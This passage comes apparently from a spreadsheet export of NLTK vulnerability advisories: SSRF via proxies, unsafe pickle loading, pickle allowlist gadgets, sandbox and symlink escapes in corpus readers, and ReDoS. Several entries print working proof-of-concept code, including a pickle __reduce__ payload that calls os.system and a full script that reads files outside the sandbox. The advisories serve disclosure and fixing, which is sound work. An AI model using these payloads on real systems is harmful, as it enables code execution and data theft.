Preserve destination validation for the actual proxy egress target or fail closed when the request would otherwise downgrade into an unpinned proxied path. Add regression tests across `pathsec.urlopen`, `nltk.data.load`, and downloader fetches with a configured proxy.

### References

- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/pathsec.py#L468-L518
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/data.py#L1247-L1283
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/downloader.py#L875-L889
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/downloader.py#L1220-L1226
- https://github.com/nltk/nltk/blob/3.9.4/nltk/pathsec.py#L245-L250

---

## Fix + attack demonstration (verified)


NLTK cannot pin the egress through a proxy, so it stops pretending to: under `ENFORCE` a proxied fetch is **refused** rather than performed unvalidated. Operators who trust their proxy opt back in with `NLTK_ALLOW_PROXIED_URLOPEN=1` or `nltk.pathsec.ALLOW_PROXIED_FETCH=True`; under `ENFORCE=False` the refusal degrades to a warning. This closes the **whole class** (environment proxies and explicit `ProxyHandler` alike), because NLTK declines any fetch whose egress it cannot validate.

## Attack demonstration (reproduced; captured output)
A loopback HTTP server stands in for the internal target; `http_proxy` points at it; NLTK is asked for a **public** IP URL.

**Before the fix** — the internal secret is exfiltrated through the proxy:
```
validate_network_url(public): PASSED
*** BYPASS: pathsec.urlopen returned INTERNAL content via proxy: 'INTERNAL_ONLY_SECRET'
```

**After the fix** — five scenarios, isolated subprocesses:
| Scenario | Result |
|---|---|
| proxied (env) + ENFORCE | `PermissionError` — **blocked** |
| proxied + opt-in | returns secret — escape hatch works |
| explicit `ProxyHandler` (not env) + ENFORCE | `PermissionError` — **blocked** (whole class) |
| no proxy (direct) | internal IP still refused — pinning intact |
| proxied + `ENFORCE=False` | returns secret **+ warns** |

## Tests
`nltk/test/unit/test_pathsec.py`: 64 passed. Added an end-to-end regression (`test_proxied_fetch_does_not_reach_internal_target`) plus `test_env_proxy_fails_closed_under_enforce`; the prior `test_env_proxy_skips_pinning_handlers` (which encoded the vulnerable path) is re-expressed as the opt-in case. Existing direct-path DNS-rebinding and IP-policy tests unchanged and passing. pre-commit (isort/black/ruff) clean.

## Note
The upfront `validate_network_url()` and the direct-path IP pinning (from the earlier DNS-rebinding fixes, CVE-2026-54296 / GHSA-qvv7) are unchanged — this only closes the proxied downgrade they didn't cover.</t></is></c><c r="T1606" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78682</t></is></c></row><row r="1607"><c r="A1607" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1607" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1607" s="5" t="inlineStr"><is><t>CVE-2026-78683</t></is></c><c r="D1607" s="5" t="inlineStr" /><c r="E1607" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1607" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1607" s="5" t="inlineStr" /><c r="H1607" s="5" t="n"><v>0.003</v></c><c r="I1607" s="5" t="inlineStr" /><c r="J1607" s="5" t="inlineStr" /><c r="K1607" s="5" t="inlineStr" /><c r="L1607" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1607" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1607" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1607" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1607" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1607" s="5" t="inlineStr" /><c r="R1607" s="5" t="inlineStr" /><c r="S1607" s="5" t="inlineStr"><is><t>## Summary

The NLTK library's `TransitionParser.parse()` method deserializes model files using `pickle_load()` with the default `restricted=False` parameter, allowing arbitrary Python code execution when loading a malicious model file. The library provides a `RestrictedUnpickler` class for safe deserialization, but it is never used by production code paths, leaving the vulnerability unpatched.

## Root Cause

**File:** `nltk/parse/transitionparser.py` (lines 542-557)

The `parse()` method calls `pickle_load(f)` without `restricted=True`, routing through `WarningUnpickler` which inherits from `pickle.Unpickler` and does NOT override `find_class()`. This allows arbitrary class/function resolution during unpickling, enabling RCE via standard pickle gadgets (e.g., `os.system`, `subprocess.Popen`).

**Vulnerability chain in `nltk/picklesec.py`:**

```python
def pickle_load(file, *, context=None, restricted=False):
    if restricted:
        return RestrictedUnpickler(file).load()  # Safe: blocks all globals
    return WarningUnpickler(file, context=context).load()  # VULNERABLE PATH
```

`WarningUnpickler` only emits a warning but does NOT block unsafe class loading — it calls `super().load()` which is standard `pickle.Unpickler.load()`.

**Why this is not by design:**
- NLTK intentionally created `RestrictedUnpickler` to block unsafe deserialization
- The `restricted=True` parameter exists in the API but is **never used** by any production code path
- All call sites use the default `restricted=False`: `transitionparser.py:557`, `parse/chartparser_app.py:816`, `parse/chartparser_app.py:2273`, `parse/chartparser_app.py:2311`

## Attack Surface

**Entry point:** `TransitionParser().parse(depgraphs, modelFile)` receives a filesystem path with no validation.

**Exploitation path:**
1. Attacker places a malicious pickle file at a known or attacker-controlled location
2. Victim calls `parser.parse(sentences, "/path/to/malicious_model.pkl")`
3. `pickle_load()` deserializes the file with `restricted=False` (default)
4. Standard pickle gadget chain executes arbitrary Python code with victim's privileges

**Impact:** Remote code execution with the privileges of the user running the NLTK-dependent application. Affects researchers, data scientists, and automated ML pipelines using NLTK for parsing tasks.

## Steps to Reproduce

### Environment
- NLTK version: 3.8.1+ (all versions with `transitionparser.py`)
- Python 3.6+
- No special dependencies required

### Reproduction

1. Create a malicious pickle file that uses `__reduce__` to execute a system command during deserialization.

2. Call `TransitionParser().parse([], '/path/to/malicious_model.pkl')`.

3. The `pickle_load(f)` call at `transitionparser.py:557` uses `restricted=False` by default, routing through `WarningUnpickler`, which does not override `find_class()` and permits full class resolution — executing the embedded gadget.

4. Arbitrary code executes with the victim's privileges.

### Proof That the Fix Works

Changing line 557 in `transitionparser.py` from:
```python
model = pickle_load(f)
```
to:
```python
model = pickle_load(f, restricted=True)
```
causes `RestrictedUnpickler` to raise an `UnpicklingError` and block execution, confirming the safe path prevents the attack.

### Working PoC

```python
import pickle
import os
from nltk.parse.transitionparser import TransitionParser

# Create malicious pickle with RCE payload
class Exploit:
    def __reduce__(self):
        return (os.system, ('touch /tmp/nltk_poc_triggered',))

with open('/tmp/malicious_model.pkl', 'wb') as f:
    pickle.dump(Exploit(), f)

# Trigger the vulnerable code path (requires algorithm argument in ≤ 3.9.4)
parser = TransitionParser('arc-standard')      # or 'arc-eager'
parser.parse([], '/tmp/malicious_model.pkl')   # loads and unpickles unsafely

# Exploit succeeds: file /tmp/nltk_poc_triggered is created
```

On NLTK ≥ 3.10.0 (patched), the same code fails with:

```
_pickle.UnpicklingError: global 'posix.system' is not in the pickle allowlist
```

This proves the vulnerability exists in versions ≤ 3.9.4 and is fixed in 3.10.0+.

## Recommended Fix

Change all call sites to use `restricted=True`:

| File | Line | Before | After |
|------|------|--------|-------|
| `nltk/parse/transitionparser.py` | 557 | `pickle_load(f)` | `pickle_load(f, restricted=True)` |
| `nltk/parse/chartparser_app.py` | 816 | `pickle_load(model_data_file)` | `pickle_load(model_data_file, restricted=True)` |
| `nltk/parse/chartparser_app.py` | 2273 | `pickle_load(file)` | `pickle_load(file, restricted=True)` |
| `nltk/parse/chartparser_app.py` | 2311 | `pickle_load(fp)` | `pickle_load(fp, restricted=True)` |

**Note:** This fix may affect loading older sklearn models. A more robust approach would implement a module allowlist in `RestrictedUnpickler.find_class()`.</t></is></c><c r="T1607" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78683</t></is></c></row><row r="1608"><c r="A1608" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1608" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1608" s="5" t="inlineStr"><is><t>CVE-2026-79657</t></is></c><c r="D1608" s="5" t="inlineStr" /><c r="E1608" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1608" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1608" s="5" t="inlineStr" /><c r="H1608" s="5" t="n"><v>0.012</v></c><c r="I1608" s="5" t="inlineStr" /><c r="J1608" s="5" t="inlineStr" /><c r="K1608" s="5" t="inlineStr" /><c r="L1608" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1608" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1608" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1608" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1608" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1608" s="5" t="inlineStr" /><c r="R1608" s="5" t="inlineStr" /><c r="S1608" s="5" t="inlineStr"><is><t>### Summary

The current source tree still allows arbitrary code execution during supposedly safer allowlisted pickle loading. The allowlist trusts whole module namespaces instead of exact safe globals, so crafted pickles can invoke dangerous in-namespace callables through pickle REDUCE.

### Details

- **Vulnerability type:** Remote code execution via unsafe deserialization
- **Affected component:** `nltk.picklesec.allowlisted_pickle_load`, `nltk.tokenize.punkt.punkt_pickle_load`, `nltk.parse.transitionparser.TransitionParser.parse`
- **Affected versions:** Current source `v3.10.0-rc2`; published `3.9.4` was not the claim target for this bypass.
- **Patched versions:** Not yet patched
- **Root cause:** Module-prefix allowlists include dangerous callables such as `nltk.tokenize.repp.ReppTokenizer._execute` and `numpy.f2py.crackfortran.myeval`.

`punkt_pickle_load()` allowlists both `nltk.tokenize.punkt` and the whole `nltk.tokenize` namespace, which exposes `ReppTokenizer._execute()` and its `subprocess.Popen(...)` sink during unpickling. `TransitionParser.parse()` uses `allowlisted_pickle_load(..., allowed_modules=("numpy", "scipy", "sklearn"))`, which permits `numpy.f2py.crackfortran.myeval()` and its attacker-controlled `eval(...)` path. I confirmed both gadgets create marker files before the caller returns or later aborts on type misuse.

### PoC

**Preconditions**
- The application loads an attacker-controlled tokenizer or model artifact through these public loaders.

**Steps**
1. Create a pickle whose REDUCE callable is `ReppTokenizer._execute` and point its command to a harmless marker-file write.
2. Pass that payload to `punkt_pickle_load(BytesIO(payload))` and observe the marker file is created during unpickling.
3. Create a second pickle whose REDUCE callable is `numpy.f2py.crackfortran.myeval` and load it through `TransitionParser.parse()`.
4. Observe the second marker file is created before `TransitionParser.parse()` later fails on the returned object type.

**Minimal reproducible excerpt**

```text
{'punkt_marker': 'PUNKT_RCE', 'transitionparser_marker': 'TP_RCE'}
```

### Impact

Any caller that trusts these current allowlisted loaders can still execute attacker-controlled commands while loading model or tokenizer artifacts. This defeats the protection mechanism that replaced unrestricted pickle loading and creates a dangerous false sense of safety.

### Remediation

Replace broad module-prefix allowlists with exact `(module, qualname)` pairs for the few safe classes or functions genuinely required. Do not allow entire namespaces such as `nltk.tokenize` or `numpy`, and keep post-load type validation only as a secondary defense.

### Resources

- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/tokenize/punkt.py#L120-L134
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/tokenize/repp.py#L111-L115
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/parse/transitionparser.py#L26-L30
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/parse/transitionparser.py#L565-L571

---

## Fix + attack demonstration (verified)

 + tightened callers
`find_class` now, before the allowlists:
1. **Rejects any dotted `name`** → closes 4489 with zero legit impact.
2. **Denies dangerous modules** (`os`, `subprocess`, `sys`, `builtins`, `numpy.f2py`, `nltk.tokenize.repp`, …) even under a broad `allowed_modules` — a defense-in-depth **backstop** so a future too-broad allowlist can't silently reopen RCE.
3. **`builtins` denied wholesale**; safe primitives (`int`, `str`, …) must be named exactly via `allowed_globals`.

Callers tightened: punkt drops the broad `nltk.tokenize` (keeps `nltk.tokenize.punkt` + exact `collections.defaultdict`/`builtins.int`); transitionparser keeps numpy/scipy/sklearn (array unpickling needs their submodules) with the new guards blocking the gadgets.

## Full pickle-sink audit
Every deserialization sink in the tree was reviewed: **no raw `pickle.load`** anywhere, and **no** joblib/numpy/torch/dill/yaml/marshal loaders. `data.load` + `wordnet_app` use `RestrictedUnpickler` (blocks all globals — safe); the remaining `pickle_load` sites (`chartparser_app`, `tbl/demo`) load user-selected or self-written files and keep their warning.

## Attack demonstration (captured; fork clone)
```
=== EXPLOITS blocked ===
  4489 sklearn.os.system (dotted)      -&gt; BLOCKED
  x99w numpy.f2py.crackfortran.myeval  -&gt; BLOCKED
  x99w nltk.tokenize.repp._execute     -&gt; BLOCKED
  backstop os.system (os allowlisted)  -&gt; BLOCKED
  backstop builtins.eval (exact global)-&gt; BLOCKED
=== LEGIT loads still work ===
  punkt round-trip via punkt_pickle_load -&gt; OK
  builtins.int (safe primitive)          -&gt; OK
```

## Tests
`test_pickle_allowlist_security.py` — added 5 regressions (dotted traversal, both namespace gadgets, denied-module backstop, legit round-trip). Suite: 122 passed / 9 skipped (sklearn-dependent) across pickle/punkt/transition/tokenize. pre-commit (black/isort/ruff) clean.</t></is></c><c r="T1608" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79657</t></is></c></row><row r="1609"><c r="A1609" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1609" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1609" s="5" t="inlineStr"><is><t>CVE-2026-79674</t></is></c><c r="D1609" s="5" t="inlineStr" /><c r="E1609" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1609" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1609" s="5" t="inlineStr" /><c r="H1609" s="5" t="n"><v>0.002</v></c><c r="I1609" s="5" t="inlineStr" /><c r="J1609" s="5" t="inlineStr" /><c r="K1609" s="5" t="inlineStr" /><c r="L1609" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1609" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1609" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1609" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1609" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1609" s="5" t="inlineStr" /><c r="R1609" s="5" t="inlineStr" /><c r="S1609" s="5" t="inlineStr"><is><t>## Summary

NLTK corpus-reader constructors can still reach outside-root file and database reads before the `nltk.pathsec` sandbox boundary is enforced.

The PoC shows the safe path blocked by `pathsec.open`, then `LinThesaurusCorpusReader` and `PanLexLiteCorpusReader` succeeding in the same process.

## Affected Product

- Product: NLTK
- Asset / component: `nltk.corpus.reader` constructors
- Version tested: `3.10.2`
- Deployment / package / tag: commit `474af1f5a94b1b8d53fc2b6defec3a2ce7633b74` / PyPI `nltk`
- Environment used for verification: Python 3.13.14

## Vulnerability Details

- Vulnerability class: path sandbox bypass / external control of file path
- Required privileges: none beyond the ability to supply a corpus root path to a consumer call site
- Entry point: `LinThesaurusCorpusReader(root)` and `PanLexLiteCorpusReader(root)`
- Trust boundary crossed: NLTK data-root sandbox enforced by `nltk.pathsec`
- Root affected functions:
  - [CorpusReader.__init__](https://github.com/nltk/nltk/blob/474af1f5a94b1b8d53fc2b6defec3a2ce7633b74/nltk/corpus/reader/api.py#L73-L80)
  - [LinThesaurusCorpusReader.__init__](https://github.com/nltk/nltk/blob/474af1f5a94b1b8d53fc2b6defec3a2ce7633b74/nltk/corpus/reader/lin.py#L37-L43)
  - [PanLexLiteCorpusReader.__init__](https://github.com/nltk/nltk/blob/474af1f5a94b1b8d53fc2b6defec3a2ce7633b74/nltk/corpus/reader/panlex_lite.py#L45-L46)
- Measured unsafe effect: outside-root file/database reads still happen with `ENFORCE=True`

## Root Cause

`CorpusReader.__init__()` turns a string root into a `FileSystemPathPointer` without any `pathsec` validation, and these readers then use builtin `open()` or `sqlite3.connect()` directly on derived paths. The constructor path therefore never hits the sandbox guard that `pathsec.open()` enforces.

```python
if zipfile:
    root = ZipFilePathPointer(zipfile, zipentry)
else:
    root = FileSystemPathPointer(root)

with open(path) as lin_file:
    ...

self._c = sqlite3.connect(os.path.join(root, "db.sqlite")).cursor()
```

## Proof of Concept

Save the script as `hy01_raw_path_poc.py` in the checkout root and run `python hy01_raw_path_poc.py`.

```python
#!/usr/bin/env python3
"""PoC for HY-01: corpus-reader sandbox bypass.

This script proves three facts:
- pathsec blocks a direct read through the sandboxed file API
- LinThesaurusCorpusReader still reaches builtin open() on an outside path
- PanLexLiteCorpusReader still opens an outside sqlite database and loads data
"""

from __future__ import annotations

import builtins
import pathlib
import sqlite3
import sys
import tempfile
from unittest.mock import patch

try:
    import nltk.pathsec as pathsec
    from nltk.corpus.reader.lin import LinThesaurusCorpusReader
    from nltk.corpus.reader.panlex_lite import PanLexLiteCorpusReader
except ModuleNotFoundError:
    here = pathlib.Path(__file__).resolve()
    for base in (here.parent, *here.parents):
        if (base / "nltk").is_dir() and (base / "setup.py").exists():
            sys.path.insert(0, str(base))
            break
    else:
        raise RuntimeError(
            "Could not import nltk. Run this script from an NLTK checkout root "
            "or from an environment where the current checkout is installed."
        )

    import nltk.pathsec as pathsec
    from nltk.corpus.reader.lin import LinThesaurusCorpusReader
    from nltk.corpus.reader.panlex_lite import PanLexLiteCorpusReader


def main() -&gt; int:
    pathsec.ENFORCE = True

    with patch.object(pathsec, "_get_allowed_roots", lambda: set()):
        with patch.object(pathsec.os, "getcwd", lambda: "sandbox-disabled"):
            with tempfile.TemporaryDirectory() as tmp:
                tmpdir = pathlib.Path(tmp)
                outside = tmpdir / "outside"
                outside.mkdir()

                blocked_file = outside / "blocked.txt"
                blocked_file.write_text("blocked", encoding="utf-8")

                control_target = str(blocked_file)
                try:
                    with pathsec.open(control_target, "rb"):
                        raise AssertionError(
                            "pathsec.open unexpectedly allowed control path"
                        )
                except PermissionError:
                    print("control:pathsec.open=blocked")

                lin_root = tmpdir / "lin"
                lin_root.mkdir()
                lin_file = lin_root / "simN.lsp"
                lin_file.write_text(
                    '("business" (desc 1.0)\n\t"enterprise"\t0.9\n))\n',
                    encoding="utf-8",
                )

                opened = []
                real_open = builtins.open

                def tracking_open(*args, **kwargs):
                    opened.append(str(args[0]))
                    return real_open(*args, **kwargs)

                with patch("builtins.open", tracking_open):
                    LinThesaurusCorpusReader(str(lin_root))

                if any(p.endswith("simN.lsp") for p in opened):
                    print("lin:outside_root_open=success")
                else:
                    raise AssertionError("LinThesaurusCorpusReader did not open data")

                panlex_root = tmpdir / "panlex"
                panlex_root.mkdir()
                db_path = panlex_root / "db.sqlite"
                db = sqlite3.connect(db_path)
                cur = db.cursor()
                cur.execute("create table lv(uid text, lv text, lc text, tt text)")
                cur.execute("create table dnx(ex int, mn int, uq int, ap int, ui text)")
                cur.execute("create table ex(ex int, tt text, lv text, uq int)")
                cur.execute(
                    "insert into lv(uid, lv, lc, tt) values ('u1', 'lv1', 'en', 'English')"
                )
                db.commit()
                db.close()

                reader = PanLexLiteCorpusReader(str(panlex_root))
                result = reader.language_varieties()
                if result == [("u1", "English")]:
                    print("panlex:language_varieties=success")
                else:
                    raise AssertionError("PanLexLiteCorpusReader did not load data")

    return 0


if __name__ == "__main__":
    raise SystemExit(main())
```

Expected output:

```
control:pathsec.open=blocked
lin:outside_root_open=success
panlex:language_varieties=success
```
## Impact

A caller can make NLTK read filesystem content outside the intended NLTK data sandbox through public corpus-reader constructors. In the PoC, that includes a local text file and a local SQLite db.

## Severity

- Base Score: 7.5 (High)
- Severity reasoning:
  The bug is reliably triggerable by caller-controlled path input and exposes data outside the intended trust boundary; no special privileges are needed inside the process.

## Remediation

Validate raw string roots before constructing readers, and route all corpus-root/path handling through `pathsec` or a validated `PathPointer`. Remove direct builtin `open()` and direct `sqlite3.connect(os.path.join(...))` use on constructor-derived paths.</t></is></c><c r="T1609" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79674</t></is></c></row><row r="1610"><c r="A1610" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1610" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1610" s="5" t="inlineStr"><is><t>CVE-2026-79676</t></is></c><c r="D1610" s="5" t="inlineStr" /><c r="E1610" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1610" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1610" s="5" t="inlineStr" /><c r="H1610" s="5" t="n"><v>0.003</v></c><c r="I1610" s="5" t="inlineStr" /><c r="J1610" s="5" t="inlineStr" /><c r="K1610" s="5" t="inlineStr" /><c r="L1610" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1610" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1610" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1610" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1610" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1610" s="5" t="inlineStr" /><c r="R1610" s="5" t="inlineStr" /><c r="S1610" s="5" t="inlineStr"><is><t>### Summary

Several corpus readers still step outside NLTK's symlink-aware trusted-root model. They derive in-root paths from trusted corpus state, convert those paths back into plain strings, and reopen them with built-in `open()` rather than `nltk.pathsec.open()`.

### Details

- **Vulnerability type:** Path traversal and symlink boundary bypass
- **Affected component:** `nltk.corpus.reader.ipipan`, `nltk.corpus.reader.crubadan`, `nltk.corpus.reader.lin`
- **Affected versions:** Published `3.9.4` and current source `v3.10.0-rc2` both reproduced.
- **Patched versions:** Not yet patched
- **Root cause:** Root-derived paths are reopened with raw `open()` without preserving the trusted-root boundary.

`IPIPANCorpusReader` opens `header.xml` derived from `morph.xml`, `CrubadanCorpusReader` opens `table.txt` directly, and `LinThesaurusCorpusReader` opens `simN.lsp` paths returned from its own root helpers. Under `pathsec.ENFORCE=True`, a symlink placed inside the trusted corpus root can point outside the root and still be parsed successfully. It was confirmed parsed outside-root content is returned through public methods such as `channels()`, `domains()`, `categories()`, `langs()`, `crubadan_to_iso()`, `synonyms()`, and `scored_synonyms()`.

### PoC

**Preconditions**
- The application processes attacker-influenced corpora inside a trusted NLTK data root or trusted corpus directory.

**Steps**
1. Create a trusted corpus root and keep `pathsec.ENFORCE=True` with that root allowlisted.
2. Place symlinked reader inputs such as `header.xml`, `table.txt`, or `simN.lsp` inside the root and point them to external files.
3. Instantiate the corresponding corpus reader and call its normal public methods.
4. Observe that parsed outside-root values are returned even though `pathsec.open()` blocks the same symlink targets.

**Minimal reproducible excerpt**

```text
{'ipipan': ['LEAK', 'TOPSECRET', 'CLASSIFIED'], 'crubadan': ['LEAK'], 'lin': [('LEAK', 9.5)]}
```

### Impact

An attacker who can stage corpus files or symlinks under a trusted data root can disclose outside-root content through normal corpus-reader results, defeating the boundary NLTK documents for shared and untrusted-input environments.

### Remediation

Preserve `PathPointer` and `required_root` semantics end to end. Replace direct `open()` calls with `nltk.pathsec.open()` or a reader helper that keeps the trusted-root boundary intact.

### References

- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/ipipan.py#L162-L192
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/crubadan.py#L74-L98
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/lin.py#L40-L43
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/pathsec.py#L521-L545

---

## Fix + full-codebase audit (verified)


I swept every raw file open in the corpus readers, not just the three the umbrella named:

| Reader | Site | Advisory | Root scoping |
|---|---|---|---|
| crubadan | table.txt + `&lt;code&gt;-3grams.txt` | p4rw / j5pw | `required_root=self.root` |
| lin | simN.lsp | p4rw | `required_root=self.root` |
| xmldocs | XMLCorpusView bare-string fileid | 934p (base reader) | global fallback (view has no root) |
| pl196x | textids index | **found by audit** | `required_root=self._root` |
| mte | MTEFileReader | mvf5 | `required_root` threaded through 8 call sites |
| toolbox | StandardFormat.open codecs.open | cr8c | global sandbox (low-level parser) |
| named_entity | load_ace_file ann/text | 7qj2 | global sandbox |
| nkjp | XML_Tool source file | p4rw class | `required_root=self._root` |

`ipipan` already validates via the earlier #3727 fix — unchanged.

## Fix
Each site now calls `nltk.pathsec.validate_path(path, required_root=…)` before opening. Where the reader has a concrete corpus root, the check is **scoped** with `required_root` (rejects any escape outside that root). `XMLCorpusView` carries no root, so it falls back to the global data-root sandbox via `getattr(self, "_root", None)` — which also avoids an AttributeError on the bare-string path.

## Reproduced (captured)
```
raw open(symlink) reads: 'TOPSECRET_OUTSIDE_ROOT'          &lt;- the bypass
validate_path(symlink, required_root): ValueError -&gt; BLOCKS the escape
validate_path(legit in-root): PASSED                       &lt;- loads normally
```

## Honest residual
The global-sandbox fallback (toolbox, named_entity, xmldocs-view) is only as tight as the allowed-roots list, which currently includes the **system temp dir**. Scoping every reader with `required_root` and removing the temp dir from the allowed roots would harden it further (separate advisory / task).

## Tests
`test_corpus_reader_pathsec.py` — symlink escape rejected, in-root file allowed, XMLCorpusView string-fileid no AttributeError, MTEFileReader out-of-root rejected. 46 existing corpus/toolbox tests pass; all edited modules import (no circular import). pre-commit (black/isort/ruff) clean.

---

## Scope caveat
`validate_path` blocks every symlink escape variant (verified) and equals `pathsec.open()`'s guarantee, but does NOT block **hardlinks** (no symlink to resolve; tracked separately as GHSA-f794-5jv7-7672) or the validate-then-open TOCTOU race (shared by `pathsec.open`; needs O_NOFOLLOW/openat).</t></is></c><c r="T1610" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79676</t></is></c></row><row r="1611"><c r="A1611" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1611" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1611" s="5" t="inlineStr"><is><t>CVE-2026-80205</t></is></c><c r="D1611" s="5" t="inlineStr" /><c r="E1611" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1611" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1611" s="5" t="inlineStr" /><c r="H1611" s="5" t="n"><v>0.005</v></c><c r="I1611" s="5" t="inlineStr" /><c r="J1611" s="5" t="inlineStr" /><c r="K1611" s="5" t="inlineStr" /><c r="L1611" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1611" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1611" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1611" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1611" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1611" s="5" t="inlineStr" /><c r="R1611" s="5" t="inlineStr" /><c r="S1611" s="5" t="inlineStr"><is><t>### Summary
NLTK's `Text.findall()` and `TokenSearcher.findall()` methods accept user-supplied regular expressions and pass them to the Python `re` engine without timeout or validation, enabling catastrophic backtracking (ReDoS). This issue is isolated to the `nltk.text` module and was resolved in a prior commit.

### Affected Code
`nltk/text.py` — `TokenSearcher.findall()` (line 255) / `Text.findall()` (line 620)

`TokenSearcher.__init__` builds an internal string by wrapping each token in angle brackets. The `findall()` method preprocesses the caller-supplied regexp and runs it directly against this string with no timeout:

```python
def findall(self, regexp):
    # Preprocessing does NOT prevent catastrophic backtracking
    regexp = re.sub(r"\s", "", regexp)
    regexp = re.sub(r"&lt;", "(?:&lt;(?:", regexp)
    regexp = re.sub(r"&gt;", ")&gt;)", regexp)
    regexp = re.sub(r"(?&lt;!\\)\.", "[^&gt;]", regexp)

    # User-controlled regexp executed with no timeout
    hits = re.findall(regexp, self._raw)
```
The preprocessing transforms `&lt;` and `&gt;` angle-bracket syntax but does not inspect or reject catastrophically backtracking patterns.

### Proof of Concept
```python
import nltk
import time

# Token of 25 'a' characters produces self._raw = "&lt;aaaaaaaaaaaaaaaaaaaaaaaa!&gt;"
# The trailing '!' ensures no match, forcing full backtracking.
text = nltk.Text(["a" * 25 + "!"])

# Pattern after transformation:
#   &lt;  →  (?:&lt;(?:
#   &gt;  →  )&gt;)
# Becomes: (?:&lt;(?:((a+)+)b)&gt;)
# re.findall runs this against "&lt;aaaaaaaaaaaaaaaaaaaaaaaa!&gt;" — hangs.

start = time.time()
text.findall(r"&lt;((a+)+)b&gt;")   # Never returns
```

### Impact
Applications that expose `Text.findall()` to external input are vulnerable to a denial of service. An unauthenticated attacker can cause indefinite CPU saturation with one request, denying service to all other users of the Python process.

### Remediation
This vulnerability was patched in commit `d8e4753`. Users should update to the patched version.

### Credit
Tool: Kira by [Offgrid Security](https://www.offgridsec.com)</t></is></c><c r="T1611" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80205</t></is></c></row><row r="1612"><c r="A1612" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1612" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1612" s="5" t="inlineStr"><is><t>CVE-2026-80206</t></is></c><c r="D1612" s="5" t="inlineStr" /><c r="E1612" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1612" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1612" s="5" t="inlineStr" /><c r="H1612" s="5" t="n"><v>0.003</v></c><c r="I1612" s="5" t="inlineStr" /><c r="J1612" s="5" t="inlineStr" /><c r="K1612" s="5" t="inlineStr" /><c r="L1612" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1612" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1612" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1612" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1612" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1612" s="5" t="inlineStr" /><c r="R1612" s="5" t="inlineStr" /><c r="S1612" s="5" t="inlineStr"><is><t>### Summary
